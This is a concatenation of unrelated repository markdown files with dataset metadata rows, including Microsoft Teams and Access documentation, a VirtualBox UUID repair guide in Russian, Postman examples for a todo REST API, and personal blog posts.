consecuencia. ## <a name="sending-notifications-for-tab-updates"></a>Envío de notificaciones de actualizaciones de pestañas A menudo, deseará notificar al usuario final siempre que se produzca una actualización o una acción del usuario en una pestaña. Un escenario de ejemplo consiste en asignar una tarea o un tíquet a un compañero integrante del equipo y, a continuación, notificar a ese miembro del equipo. Hay dos formas de lograr este escenario: 1. Si desea notificar a todo el canal, su bot puede enviar un mensaje al canal de forma asincrónica. No hay forma de que un bot cree proactivamente la conversación de pestaña si no se creó con la ficha. 2. Si sólo desea notificar al destinatario o a las partes interesadas implicadas en la acción, el bot puede enviar un mensaje de chat personal al usuario. Primero debe comprobar si existe una conversación personal entre su bot y el usuario. Si no es así, puede `CreateConversation` llamar para iniciar el chat personal. En ambos casos, use las notificaciones de eventos de manera inteligente y nunca el usuario no tiene actualizaciones innecesarias.
92.106383
547
0.804343
spa_Latn
0.996292
5384725664508f0062547827943a168e5d60b61c
291
md
Markdown
contrib/init/README.md
Simple-Software-Solutions/RBX-Core
8cf0dfda708233e080e8729cec0b5014218386e3
[ "MIT" ]
null
null
null
contrib/init/README.md
Simple-Software-Solutions/RBX-Core
8cf0dfda708233e080e8729cec0b5014218386e3
[ "MIT" ]
null
null
null
contrib/init/README.md
Simple-Software-Solutions/RBX-Core
8cf0dfda708233e080e8729cec0b5014218386e3
[ "MIT" ]
null
null
null
Sample configuration files for: ``` SystemD: rbxd.service Upstart: rbxd.conf OpenRC: rbxd.openrc rbxd.openrcconf CentOS: rbxd.init macOS: org.rbx.rbxd.plist ``` have been made available to assist packagers in creating node packages here. See doc/init.md for more information.
22.384615
76
0.749141
eng_Latn
0.859018
5384c624b73add81fa14be04a1561908f45c273f
178
md
Markdown
languages/common-lisp/bin/generate-scaffolding/template/.docs/introduction.md
AlexLeSang/v3
3d35961a961b5a2129b1d42f1d118972d9665357
[ "MIT" ]
3
2020-07-25T06:24:00.000Z
2020-09-14T17:39:11.000Z
languages/common-lisp/bin/generate-scaffolding/template/.docs/introduction.md
AlexLeSang/v3
3d35961a961b5a2129b1d42f1d118972d9665357
[ "MIT" ]
1
2020-01-26T20:08:06.000Z
2020-01-26T20:08:06.000Z
languages/common-lisp/bin/generate-scaffolding/template/.docs/introduction.md
AlexLeSang/v3
3d35961a961b5a2129b1d42f1d118972d9665357
[ "MIT" ]
null
null
null
[This file should be used to provide the student with just enough background to complete the tasks given in `instructions.md`. Additional details should be saved for `after.md`]
44.5
79
0.797753
eng_Latn
0.999672
5385360d0bf5ef27db9e864d3a26cb632a6fa188
1,918
md
Markdown
docs/framework/unmanaged-api/hosting/imanagedobject-getobjectidentity-method.md
JosephHerreraDev/docs.es-es
dd545ff8c6bc59a76ff761c43b14c7f05127c91a
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/hosting/imanagedobject-getobjectidentity-method.md
JosephHerreraDev/docs.es-es
dd545ff8c6bc59a76ff761c43b14c7f05127c91a
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/hosting/imanagedobject-getobjectidentity-method.md
JosephHerreraDev/docs.es-es
dd545ff8c6bc59a76ff761c43b14c7f05127c91a
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: IManagedObject::GetObjectIdentity (Método) ms.date: 03/30/2017 api_name: - IManagedObject.GetObjectIdentity api_location: - mscoree.dll api_type: - COM f1_keywords: - GetObjectIdentity helpviewer_keywords: - GetObjectIdentity method [.NET Framework hosting] - IManagedObject::GetObjectIdentity method [.NET Framework hosting] ms.assetid: b862ff3e-e480-4cdf-84e2-e1013334a467 topic_type: - apiref ms.openlocfilehash: 1b40ed8e107d30c22b4ade25d29376b1b74583d1 ms.sourcegitcommit: e5772b3ddcc114c80b4c9767ffdb3f6c7fad8f05 ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 05/26/2020 ms.locfileid: "83842418" --- # <a name="imanagedobjectgetobjectidentity-method"></a>IManagedObject::GetObjectIdentity (Método) Obtiene la identidad de este objeto administrado. ## <a name="syntax"></a>Sintaxis ```cpp HRESULT GetObjectIdentity ( [out] BSTR* pBSTRGUID, [out] int* AppDomainID, [out] CCW_PTR pCCW ); ``` ## <a name="parameters"></a>Parámetros `pBSTRGUID` enuncia Puntero al GUID del proceso en el que reside el objeto. `AppDomainID` enuncia Puntero al identificador del dominio de aplicación del objeto. `pCCW` enuncia Puntero al índice de un objeto en la tabla v clásica de COM. ## <a name="remarks"></a>Notas La identidad de un objeto administrado incluye el GUID del proceso, el identificador del dominio de aplicación y el índice del objeto en la tabla v clásica de COM. ## <a name="requirements"></a>Requisitos **Plataformas:** Vea [Requisitos de sistema](../../get-started/system-requirements.md). **Encabezado:** MSCorEE. h **Biblioteca:** Se incluye como recurso en MSCorEE. dll **.NET Framework versiones:**[!INCLUDE[net_current_v20plus](../../../../includes/net-current-v20plus-md.md)] ## <a name="see-also"></a>Vea también - [IManagedObject (Interfaz)](imanagedobject-interface.md)
30.444444
166
0.730448
spa_Latn
0.413844
53858982bab21b66074e9ab1d45310f395c1b7f9
354
md
Markdown
_projects/template.md
rguidice/personal-website
c044c4182696fe03b61cb605949974d36b41fb65
[ "MIT" ]
null
null
null
_projects/template.md
rguidice/personal-website
c044c4182696fe03b61cb605949974d36b41fb65
[ "MIT" ]
null
null
null
_projects/template.md
rguidice/personal-website
c044c4182696fe03b61cb605949974d36b41fb65
[ "MIT" ]
null
null
null
--- name: template date: 2018-05-16 tools: [Raspberry Pi, MagicMirror, Bash] image: /assets/project_images/Building_a_MagicMirror/magicmirror_final_product.JPG blog: 0 for no blog, 1 for blog, write blog below in markdown github: https://github.com/rguidice/sensehat-ddr (remove github tag for no github link) description: A Fun Project and Cool Gift ---
39.333333
87
0.785311
yue_Hant
0.207904
5385cc99b05c376c011af98f22c843c853b37205
829
md
Markdown
content/reference/services/SoftLayer_Account_Internal_Ibm/getAccountTypes.md
edsonarios/githubio_source
8d92ebf5c49a3ba0d18702062f5744b5c308b646
[ "Apache-2.0" ]
null
null
null
content/reference/services/SoftLayer_Account_Internal_Ibm/getAccountTypes.md
edsonarios/githubio_source
8d92ebf5c49a3ba0d18702062f5744b5c308b646
[ "Apache-2.0" ]
null
null
null
content/reference/services/SoftLayer_Account_Internal_Ibm/getAccountTypes.md
edsonarios/githubio_source
8d92ebf5c49a3ba0d18702062f5744b5c308b646
[ "Apache-2.0" ]
null
null
null
--- title: "getAccountTypes" description: "Validates request and, if the request is approved, returns a list of allowed uses for an automatically created IBMer Iaa... " layout: "method" tags: - "method" - "sldn" - "Account" classes: - "SoftLayer_Account_Internal_Ibm" aliases: - "/reference/services/softlayer_account_internal_ibm/getAccountTypes" --- # [SoftLayer_Account_Internal_Ibm](/reference/services/SoftLayer_Account_Internal_Ibm)::getAccountTypes Retrieves allowed internal IBM account categories ## Overview Validates request and, if the request is approved, returns a list of allowed uses for an automatically created IBMer IaaS account. ----- ### Parameters |Name | Type | Description | | --- | --- | --- | ### Required Headers * authenticate ### Return Values * array of strings
20.725
139
0.726176
eng_Latn
0.861514
53861699c02f51460ddd4dfc42862f8391e56d4f
44
md
Markdown
ChangeLog.md
akito19/htrs
5b0503d3684fb21c1906da6598b2ee3f0f143861
[ "BSD-3-Clause" ]
null
null
null
ChangeLog.md
akito19/htrs
5b0503d3684fb21c1906da6598b2ee3f0f143861
[ "BSD-3-Clause" ]
2
2020-04-27T14:23:55.000Z
2020-04-27T14:24:23.000Z
ChangeLog.md
akito19/htrs
5b0503d3684fb21c1906da6598b2ee3f0f143861
[ "BSD-3-Clause" ]
null
null
null
# Changelog for htrs ## Unreleased changes
11
21
0.75
eng_Latn
0.985334
538629102c3004ba5da6ed543d16ec3cf0b11cc7
1,602
md
Markdown
_posts/fr/papa/2016/2016-03-04-la-mort.md
ashmaroli/borisschapira.com
6d7c5032d0c00212b0eb5de023a2a883169cbed6
[ "MIT" ]
null
null
null
_posts/fr/papa/2016/2016-03-04-la-mort.md
ashmaroli/borisschapira.com
6d7c5032d0c00212b0eb5de023a2a883169cbed6
[ "MIT" ]
null
null
null
_posts/fr/papa/2016/2016-03-04-la-mort.md
ashmaroli/borisschapira.com
6d7c5032d0c00212b0eb5de023a2a883169cbed6
[ "MIT" ]
null
null
null
--- title: 'La mort' date: '2016-03-04' type: post locale: fr_FR --- Nous sommes en voiture. Je freine et m'arrête pour laisser passer un homme et son petit chien au passage piéton. Ça interpelle mon aîné, attaché sur son réhausseur à l'arrière. > — Pourquoi tu s'arrêtes la voiture ? > — Pour laisser passer le monsieur et son chien, tu vois. > — Ah oui, un petit chien. Un tout petit chien. Je sens à cette dernière phrase qu'il cogite… j'attends qu'il reprenne la parole. Ça ne rate pas. > — Il est mort, le petit chien de Mamie, Bidule. > — Oui chéri, il est mort. Il était vieux. > — Sonam est mort aussi, un jour, plus tard. > — Oui chéri, c'est aussi un chien. Un jour, il sera vieux et mourra. > — Toi aussi est mort, un jour ? > — Oui mon cœur. Tout le monde vieillit et meurt un jour. Il se met à pleurer, je comprends qu'il n'était pas prêt. > Je suis désolé, mon ange, ne t'inquiète pas. Tout va bien, Papa est là. Rien n'y fait, je l'entends pleurer à l'arrière. > Chéri, tout va bien, il ne va rien m'arriver, tu sais. Je suis là, toi aussi : tu vois, nous ne sommes pas mort ! Je l'entends qui se calme, puis il explique : > — J'ai eu peur, Papa, je veux pas être mort un jour ! > — Ne t'inquiète pas, chéri. > — Ah mais toi, tu peux est mort un jour, Papa. > — Ah, moi je peux mourir mais pas toi ? > — Oui, Papa. **Toi tu es déjà vieux, très vieux** ! {% include video_as_a_gif.html.liquid url="/assets/image/papa/2016-03-04/1" alt="Une image animée de John Cusack, incrédule. Désolé, je ne sais pas de quel film c'est tiré" caption="Moi, vieux ?" %}
34.826087
176
0.689139
fra_Latn
0.995222
53864f5cdda58eab5d3f947d55378d2111b581ce
6,821
md
Markdown
src/posts/2016-11-18-the-trail-behind-me.md
subvisual/subvisual.com
758c29017ed10c1ac5b0f632907c41d68a59c841
[ "MIT" ]
3
2020-02-12T21:37:21.000Z
2020-10-07T15:52:40.000Z
src/posts/2016-11-18-the-trail-behind-me.md
subvisual/subvisual.com
758c29017ed10c1ac5b0f632907c41d68a59c841
[ "MIT" ]
78
2019-04-12T12:29:21.000Z
2022-02-26T10:18:36.000Z
src/posts/2016-11-18-the-trail-behind-me.md
subvisual/subvisual.com
758c29017ed10c1ac5b0f632907c41d68a59c841
[ "MIT" ]
5
2019-06-19T14:03:56.000Z
2020-10-15T16:44:19.000Z
--- path: /posts/117-the-trail-behind-me/ title: "The Trail Behind Me" author: pedro-costa date: 2016-11-18 cover: https://subvisual.s3.amazonaws.com/blog/hero/185/[email protected] tags: - general intro: "It has already been a year since my first day at Subvisual. I was no stranger to working with this team then. I made a point of joining the RubyConf Portugal organisation team ever since the idea first came up and I've been involved in all the meetups and activities that I could. Nonetheless, I thought a recap of the events, both those that led me here and those since I've been here, would be a fit way to celebrate the achievement." --- It has already been a year since my first day at Subvisual. I was no stranger to working with this team then. I made a point of joining the RubyConf Portugal organisation team ever since the idea first came up and I've been involved in all the meetups and activities that I could. Nonetheless, I thought a recap of the events, both those that led me here and those since I've been here, would be a fit way to celebrate the achievement. ## Before Subvisual was not the first company I worked at after college, although that was the initial plan. For many reasons, it just did not happen back then. My first job out of college was at a mid-sized international company, mostly working with Java EE. I started in the services team, putting out fires for one of their largest customers, but they soon realised I tend to over-engineer things. And, for the first time until and since then, they welcomed and nurtured that part of me. They tested me with some scripts to automate operations tasks, and after I nailed those they moved me to the engineering team, where I went about learning everything I could, from new frameworks to security mechanisms. After little more than a year there, I got an offer to work at another company. Better pay and I would help build a team I would lead. It was just too good to refuse. I could be a lead developer by the age of 25. So I took the plunge. It started well. I learned Elixir before version 1.0 was even out (building an aggregator service), worked on a Rails project with some fuzzy requirements, and on a cross-platform application using the Adobe Flex framework. But in the end it did not deliver my expectations, I wasn't progressing. And so I left. I joined Subvisual soon after that but in retrospective, both companies taught me valuable lessons. I learned to accept yourself, to use my strengths to work on my weaknesses; I found my drive, and I now try to build upon it, and I learned that evolution is the one thing I should be constantly aiming for. ## Occam site ![file](https://subvisual.s3.amazonaws.com/blog/post_image/226/original.jpeg) My first project at Subvisual was a static site for Occam Education. Sounds simple enough right? Turns out it was also my worst estimation to the date. While I had known most of the team for a while then, I underestimated their drive for quality. Unlike me, it did not come from a place of over-engineering and pedantic look-ahead. Their methods and tools had been battle tested, had a purpose. And were all new to me. I learned mostly about Middleman and SuitCSS, having stretched both to their limits, and had extended discussions with Bruno about all the philosophy behind how the team builds pages. And it eventually made sense. I just regret that it took more than five times the estimated time, but the truth is that I've since been more careful with the estimations I give. Underpromise and overachieve. That site is still live, although it may have changed a little since I last touched it. You can check it out at [http://occameducation.com/](http://occameducation.com/) . ## Cadoo ![file](https://subvisual.s3.amazonaws.com/blog/post_image/224/original.jpeg) Cadoo was an interesting one. I joined Miguel in what was to be basically a rethink of [Easy Money](https://subvisual.co/case-studies/easy-money/), a previous project using [Uphold](https://uphold.com/)'s API to facilitate money transfers. Cadoo ended up being the first of multiple projects using that API to help people interact with each other using money. The project itself was a great opportunity to tune-up my Rails skills with someone who had a lot more experience, and for both of us to learn React. We pushed the boundaries of my experience with Rails and even tried some patterns I only had had the opportunity to use in Java projects. In fact, there is a whole chain of service objects in that project just to generate the dynamic image that goes into the e-mails (I'm kinda proud of that one). As for the frontend, we pushed the limits of CSS transitions, using React to quickly adapt the classes in the markup to the state we wanted to show. Turns out this got so cool Miguel even made some talks about it. The project is live and running, so feel free to try it at [https://cadoo.io/](https://cadoo.io/) . ## Crediflux ![file](https://subvisual.s3.amazonaws.com/blog/post_image/225/original.jpeg) After Cadoo I paired with Bruno once again, now to develop a platform for companies to perform easier credit analysis. The backend was Rails, but the frontend was a new combo of Angular.js and Redux. I got to admit it took me a while to get my head around it. I was not familiar with Redux, much less with Angular.js to Bruno's proficiency level. And, as is usual when you face an expert in a technology which is new to you, I got off to a bumpy start. A file uploader, which had taken me less than a day in Cadoo, took me almost two weeks in this project, mostly due to my inexperience. When I joined the project Bruno had already been with it for almost a year. Eventually, he ended up moving to another project, and I got to be on my own for the first time at Subvisual. I tried to step up to the responsibility and took it through the last mile. We released the first version in August. Since then we've helped Crediflux set up its own team, and they already have some client installations coming soon. The project has already gathered some media attention, but if you haven't heard of them take a peek at [https://crediflux.pt/](https://crediflux.pt/) . ## Conclusion The truth is that I never made any decision about my professional path where an offer from Subvisual wasn't on the table in one way or another. It always seemed like just a matter of time until I joined these ranks. This is a team I truly admire, both collectively and every single one individually. I am ever so proud to be one of them and can't wait to find out the next thing I'm going to learn as part of this team. *Curious about this team's frame of mind? Check [this post](https://subvisual.co/blog/posts/77) by João to know a little more about the company and the philosophies behind our work.*
101.80597
548
0.779504
eng_Latn
0.99992
5386e7c15354626c1a3ff64a6b86a0f471fe0b98
1,212
md
Markdown
README.md
shawnwhiteside/example-todo-rest-service
d28cf226571ef6b85e2f38b8a93cc2734271caac
[ "Apache-2.0" ]
null
null
null
README.md
shawnwhiteside/example-todo-rest-service
d28cf226571ef6b85e2f38b8a93cc2734271caac
[ "Apache-2.0" ]
null
null
null
README.md
shawnwhiteside/example-todo-rest-service
d28cf226571ef6b85e2f38b8a93cc2734271caac
[ "Apache-2.0" ]
null
null
null
# example-todo-rest-service Postman Requests GET /todo/ HTTP/1.1 Host: localhost:8080 Cache-Control: no-cache Postman-Token: 5840f3b5-2a04-b057-b37b-039ae85cdfc0 GET /todo/37683a56-6604-4e24-adc5-69edf830d847 HTTP/1.1 Host: localhost:8080 Cache-Control: no-cache Postman-Token: 72b1050c-d7bc-cf8e-46b3-fe64b46420b4 POST /todo HTTP/1.1 Host: localhost:8080 Content-Type: application/json Cache-Control: no-cache Postman-Token: d5bef4f7-6a2c-9b2d-ebc3-0cd8ee634458 {"title":"title45", "description":"description45", "dueDate":"x2018-01-01T09:50:00"} POST /todo/bulk HTTP/1.1 Host: localhost:8080 Content-Type: application/json Cache-Control: no-cache Postman-Token: 18604e4e-d9c7-bb61-6774-d131d69e7322 [ {"title":"title55", "description":"description55", "dueDate":"2018-01-01T09:50:00"}, {"title":"title599", "dueDate":"2018-01-01T09:50:00"}, {"title":"title599", "description":"description57", "dueDate":"2018-01-01T09:50:00"} ] PATCH /todo/37683a56-6604-4e24-adc5-69edf830d847 HTTP/1.1 Host: localhost:8080 Content-Type: application/json Cache-Control: no-cache Postman-Token: 6be0065e-7268-d0ee-59d9-605e73d4efa4 {"title":"title1", "description":"description1", "dueDate":"2018-01-01T09:50:00"}
27.545455
85
0.758251
yue_Hant
0.31957
53870de88f3aee878fe6826215af3de884d3d6c6
2,222
md
Markdown
access/Concepts/Miscellaneous/cancel-method-example-vbscript.md
CeptiveYT/VBA-Docs
1d9c58a40ee6f2d85f96de0a825de201f950fc2a
[ "CC-BY-4.0", "MIT" ]
283
2018-07-06T07:44:11.000Z
2022-03-31T14:09:36.000Z
access/Concepts/Miscellaneous/cancel-method-example-vbscript.md
CeptiveYT/VBA-Docs
1d9c58a40ee6f2d85f96de0a825de201f950fc2a
[ "CC-BY-4.0", "MIT" ]
1,457
2018-05-11T17:48:58.000Z
2022-03-25T22:03:38.000Z
access/Concepts/Miscellaneous/cancel-method-example-vbscript.md
CeptiveYT/VBA-Docs
1d9c58a40ee6f2d85f96de0a825de201f950fc2a
[ "CC-BY-4.0", "MIT" ]
469
2018-06-14T12:50:12.000Z
2022-03-27T08:17:02.000Z
--- title: Cancel method example (VBScript) ROBOTS: INDEX ms.prod: access ms.assetid: 3c5a14fa-f4b1-6c32-9014-505817c6e4cf ms.date: 06/08/2019 ms.localizationpriority: medium --- # Cancel method example (VBScript) **Applies to:** Access 2013 | Access 2016 The following example shows how to read the [Cancel](https://msdn.microsoft.com/library/747edc04-a5cc-3631-2d0b-82e7e41a76b7%28Office.15%29.aspx) method at run time. Cut and paste the following code to Notepad or another text editor and save it as **CancelVBS.asp**. You can view the result in any client browser. ```vb <!-- BeginCancelVBS --><Script Language="VBScript"> <!--Sub cmdCancelAsync_OnClick ' Terminates currently running AsyncExecute,' ReadyState property set to adcReadyStateLoaded, ' Recordset set to NothingADC.Cancel End Sub Sub cmdRefreshTable_OnClickADC.Refresh End Sub--> </Script> <OBJECT CLASSID="clsid:BD96C556-65A3-11D0-983A-00C04FC29E33" ID="ADC">. <PARAM NAME="SQL" VALUE="Select FirstName, LastName from Employees"><PARAM NAME="CONNECT" VALUE="Provider='sqloledb';Integrated Security='SSPI';Initial Catalog='Northwind'"> <PARAM NAME="Server" VALUE="https://<%=Request.ServerVariables("SERVER_NAME")%>">. </OBJECT> <TABLE DATASRC=#ADC><TBODY> <TR><TD><SPAN DATAFLD="FirstName"></SPAN></TD> <TD><SPAN DATAFLD="LastName"></SPAN></TD></TR> </TBODY></TABLE> <FORM><INPUT type="button" value="Refresh" id=cmdRefreshTable name=cmdRefreshTable> <INPUT type="button" value="Cancel" id=cmdCancelAsync name=cmdCancelAsync></FORM> <!-- EndCancelVBS --> ``` ## See also - [Access for developers forum](https://social.msdn.microsoft.com/Forums/office/home?forum=accessdev) - [Access help on support.office.com](https://support.office.com/search/results?query=Access) - [Access help on answers.microsoft.com](https://answers.microsoft.com/) - [Access forums on UtterAccess](https://www.utteraccess.com/forum/index.php?act=idx) - [Access developer and VBA programming help center (FMS)](https://www.fmsinc.com/MicrosoftAccess/developer/) - [Access posts on StackOverflow](https://stackoverflow.com/questions/tagged/ms-access) [!include[Support and feedback](~/includes/feedback-boilerplate.md)]
45.346939
314
0.741224
yue_Hant
0.708915
538715490f2e7517abad5b33546594da0b14d1f8
2,014
md
Markdown
conferences/law-and-ai-abo-akademi/tuomas-poysti-legal-certainty-and-right-to-a-human-face.md
smspillaz/reading
b9c014906296162db61886e4e9e8600dbfce2b84
[ "MIT" ]
1
2022-03-10T06:07:19.000Z
2022-03-10T06:07:19.000Z
conferences/law-and-ai-abo-akademi/tuomas-poysti-legal-certainty-and-right-to-a-human-face.md
smspillaz/reading
b9c014906296162db61886e4e9e8600dbfce2b84
[ "MIT" ]
null
null
null
conferences/law-and-ai-abo-akademi/tuomas-poysti-legal-certainty-and-right-to-a-human-face.md
smspillaz/reading
b9c014906296162db61886e4e9e8600dbfce2b84
[ "MIT" ]
null
null
null
Legal Certainty, means multiple qualities: - Accessibiltiy of law - Relative stabiltiy of law and decisions based on them - Plausibility - Intelligability - Understandability Both persons and corporations can align their activities in advance in accordance with the requirements of the law. Abscence of arbitrary use of power. Legal certainty requires accountability for the use of power. Legitimate expectaions and fair treatment. Automation attempts are not new and automation extends beyond AI and covers both decisionmaking and service production & decision support systems. Finnish Constitutional Law Committee positions and prior constitutionality review opinions on automation and automatized decisionmaking: 1. Proper legal bases and legislated safeguards on good administratio 2. How to handle risks? Substantive element in light of section 21 of the constitution. Automated assistance of the decisions etc - how had they been organized. Article 22 of the GDPR: Requires specific national legislation on the use of fully automated decisionmaking. The legislator's eventual role is much broader than simply to provide the formal authorisation for ADM, but also to safeguard good administration. Minimalistic legislative role should be rejected. The other alternative, a risk centric view. Apart from administrative view and judicial review, we need to strengthen legality supervision for law proposals. Oversight on a systemic basis, this system complements the system of control by the courts. Transparency related question: What about potential research for the lawmaker to engage in when it comes to understanding and finding that certain documents are to be deemed public. - Is mere publication of the source code sufficient? How can you ensure that that the published models are understandable? - Judgement in gothenburg: "algorithm and source code" is a public document. There were no IP issues because the ownership of the source code had been transferred to the municipality.
61.030303
241
0.820755
eng_Latn
0.999303
538868c2b76dfe496ff1a25a04099fa98f6703a5
3,743
md
Markdown
_posts/2018-12-6-how-to-set-uuid.md
atnimak/atnimak.github.io
45560d06efc76a5eec4bd7d9426ebc36247b0a9b
[ "MIT" ]
null
null
null
_posts/2018-12-6-how-to-set-uuid.md
atnimak/atnimak.github.io
45560d06efc76a5eec4bd7d9426ebc36247b0a9b
[ "MIT" ]
null
null
null
_posts/2018-12-6-how-to-set-uuid.md
atnimak/atnimak.github.io
45560d06efc76a5eec4bd7d9426ebc36247b0a9b
[ "MIT" ]
null
null
null
--- layout: post title: Как установить UUID и исправить ошибку 0x80004005 UUID doesn`t match tags: virtualbox --- После создания снапшота или после перемещения .vhd или .vdi файла, при запуске виртуальной машины появляется ошибка 0x80004005 UUID doesn`t match --- <script type="text/javascript" src="/public/js/jssor.slider.min.js"></script> Текст ошибки примерно такой ``` Fehlercode: E_FAIL (0x80004005) Component: ProgressProxy Interface: IProgress {c20238e4-3221-4d3f-8891-81ce92d9f913} ``` В этом случае менеджер виртуальных машин показывает ошибку, что родительский UUID снапшота не соответствует UUID диска-родителя, хранящемуся в реестре носителей `c: \ Users \ Username \ .virtualbox \ VirtualBox.xml.` или ``` Parent UUID {00000000-0000-0000-0000-000000000000} of the medium ‘C:\Users\Username\VirtualBox VMs\XP-nik\Snapshots\{5ad80a47-8509-4b7d-9955-44bf137a77c7}.vhd’ does not match UUID {94b27e89-d561-4449-a1a7-83c2f1dd8d12} of its parent medium stored in the media registry (‘C:\Users\Username\.VirtualBox\VirtualBox.xml’). error code: E_FAIL (0x80004005) ``` Как и в первом случае родительский UIID снапшота не соответствует UUID диска-родителя, хранящемуся в реестре носителей `c: \ Users \ Username \ .virtualbox \ VirtualBox.xml.` Мы можем это поправить. Для начала нужно запустить cmd.exe от имени администратора, перейти в каталог, где установлена VirtualBox ## В первом случае Нам нужно получить UUID родительского диска ``` D:\> vboxmanage internalcommands dumphdinfo harddisk0.vdi --- Dumping VD Disk, Images=1 Dumping VD image "harddisk0.vdi" (Backend=VHD) Header: Geometry PCHS=20573/16/255 LCHS=0/0/0 cbSector=512 Header: uuidCreation={b76d8026-e222-470a-9c83-bc91351bb307} Header: uuidParent={00000000-0000-0000-0000-000000000000} ``` и свойства снапшота: ``` D:\>vboxmanage internalcommands dumphdinfo "c:\Users\UserName\VirtualBox VMs\VMName\Snapshots\{fdb2b61d-2212-45cc-8d29-b9f598d06f39}.vhd" --- Dumping VD Disk, Images=1 Dumping VD image "c:\Users\UserName\VirtualBox VMs\VMName\Snapshots\{fdb2b61d-2212-45cc-8d29-b9f598d06f39}.vhd" (Backend=VHD) Header: Geometry PCHS=20573/16/255 LCHS=0/0/0 cbSector=512 Header: uuidCreation={fdb2b61d-2212-45cc-8d29-b9f598d06f39} Header: uuidParent={00000000-0000-0000-0000-000000000000} ``` Родительский UUID снапшота (00000000-0000-0000-0000-000000000000) установлен неверно. Установим правильный родительский UIID снапшоту: ``` D:\>VBoxManage.exe internalcommands sethdparentuuid "c:\Users\UserName\VirtualBox VMs\VMName\Snapshots\{fdb2b61d-2212-45cc-8d29-b9f598d06f39}.vhd" {b76d8026-e222-470a-9c83-bc91351bb307} UUID changed to: b76d8026-e222-470a-9c83-bc91351bb307 ``` Теперь виртуальная машина должна раотать верно, загружаться и последний снапшот должен быть доступен. ## Во втором случае ``` Parent UUID {00000000-0000-0000-0000-000000000000} of the medium ‘C:\Users\Username\VirtualBox VMs\XP-nik\Snapshots\{5ad80a47-8509-4b7d-9955-44bf137a77c7}.vhd’ does not match UUID {94b27e89-d561-4449-a1a7-83c2f1dd8d12} of its parent medium stored in the media registry (‘C:\Users\Username\.VirtualBox\VirtualBox.xml’). error code: E_FAIL (0x80004005) ``` В сообщении об ошибке, у нас уже есть UUID снапшота и правильный UUID родительского диска, нам остается только присвоить снапшоту правильный родительский UUID: ``` C:\Program Files\Oracle\VirtualBox>VBoxManage.exe internalcommands sethdparentuuid C:\Users\nik.NUTEP\VirtualBox VMs\XP-nik\Snapshots\{5ad80a47-8509-4b7d-9955-44bf137a77c7}.vhd {94b27e89-d561-4449-a1a7-83c2f1dd8d12} ``` После этого виртуальная машина должна работать правильно. Также это решение работает, если vhd файлы вашей вируальной машины лежат не в стандартной папке виртуальной машины и снапшоты иногда теряют своих родителей.
47.987179
318
0.79642
rus_Cyrl
0.254957
5388a5a3dfd424db95778ebc659bf1ade22ecd07
2,238
md
Markdown
AlchemyInsights/set-up-cloud-auto-attendant.md
isabella232/OfficeDocs-AlchemyInsights-pr.nb-NO
e72dad0e24e02cdcb7eeb3dd8c4fc4cf5ec56554
[ "CC-BY-4.0", "MIT" ]
2
2020-05-19T19:07:15.000Z
2021-03-06T00:34:53.000Z
AlchemyInsights/set-up-cloud-auto-attendant.md
isabella232/OfficeDocs-AlchemyInsights-pr.nb-NO
e72dad0e24e02cdcb7eeb3dd8c4fc4cf5ec56554
[ "CC-BY-4.0", "MIT" ]
3
2020-06-02T23:25:08.000Z
2022-02-09T06:52:49.000Z
AlchemyInsights/set-up-cloud-auto-attendant.md
isabella232/OfficeDocs-AlchemyInsights-pr.nb-NO
e72dad0e24e02cdcb7eeb3dd8c4fc4cf5ec56554
[ "CC-BY-4.0", "MIT" ]
2
2019-10-09T20:30:02.000Z
2020-06-02T23:24:46.000Z
--- title: Konfigurere en automatisk skytjeneste ms.author: pebaum author: pebaum manager: scotv ms.date: 09/21/2021 ms.audience: Admin ms.topic: article ms.service: o365-administration ROBOTS: NOINDEX, NOFOLLOW localization_priority: Normal ms.collection: Adm_O365 ms.custom: - "9000548" - "13682" ms.openlocfilehash: a6a8ac13e86ac0c6b9fa31135549d343ec0b9423 ms.sourcegitcommit: a097d1f8915a31ed8460b5b68dccc8d87e563cc0 ms.translationtype: MT ms.contentlocale: nb-NO ms.lasthandoff: 09/22/2021 ms.locfileid: "59506908" --- # <a name="set-up-a-cloud-auto-attendant"></a>Konfigurere en automatisk skytjeneste Trenger du hjelp til å konfigurere en automatisk skytjeneste? Abonnementet på over 150 kvalifiserte lisenser omfatter tilgang til FastTrack spesialister som eksternt kan hjelpe deg med å konfigurere og konfigurere funksjoner i telefonsystemet, for eksempel automatisk skytjeneste. Hvis du vil ha mer informasjon, kan [du se Kvalifisering og FastTrack for Microsoft 365.](https://docs.microsoft.com/fasttrack/introduction#what-is-fasttrack-for-microsoft-365) [](https://docs.microsoft.com/fasttrack/eligibility) Hvis du vil sende inn en forespørsel om hjelp til å konfigurere automatisk skybasert svartjeneste for organisasjonen, logger du på [Fast Track](https://www.microsoft.com/fasttrack?rtc=1). Automatiske deltakere har for øyeblikket bestemte lisensieringskrav. Hvis du vil lære hvordan du oppretter og konfigurerer Teams automatiske deltakere, kan du se Planlegge for Teams automatiske deltaker- og [samtalekøer](https://docs.microsoft.com/microsoftteams/what-are-phone-system-auto-attendants). Hvis du vil ha mer informasjon om hvordan du bruker en skybasert deltaker med Microsoft Teams, kan du se: - [Konfigurere en automatisk svardeltaker](https://docs.microsoft.com/microsoftteams/create-a-phone-system-auto-attendant) - [Opprette en samtalekø](https://docs.microsoft.com/microsoftteams/create-a-phone-system-call-queue) - [Svar automatisk svar og anropskøsamtaler direkte fra Teams](https://docs.microsoft.com/microsoftteams/answer-auto-attendant-and-call-queue-calls) - [Microsoft 365 produkter og funksjoner som støttes av FastTrack](https://docs.microsoft.com/fasttrack/products-and-capabilities#office-365)
57.384615
302
0.816354
nob_Latn
0.908288
538970637165e1472ae8f4df0c6edd82c2d8e280
196
md
Markdown
pages/system-components/ansible-tower/controls/NIST-800-53-PL-5.md
ComplianceAsCode/uswds-opencontrol
0b068f8433018c4b603057e1088a9930e9b303c5
[ "CC0-1.0" ]
null
null
null
pages/system-components/ansible-tower/controls/NIST-800-53-PL-5.md
ComplianceAsCode/uswds-opencontrol
0b068f8433018c4b603057e1088a9930e9b303c5
[ "CC0-1.0" ]
null
null
null
pages/system-components/ansible-tower/controls/NIST-800-53-PL-5.md
ComplianceAsCode/uswds-opencontrol
0b068f8433018c4b603057e1088a9930e9b303c5
[ "CC0-1.0" ]
null
null
null
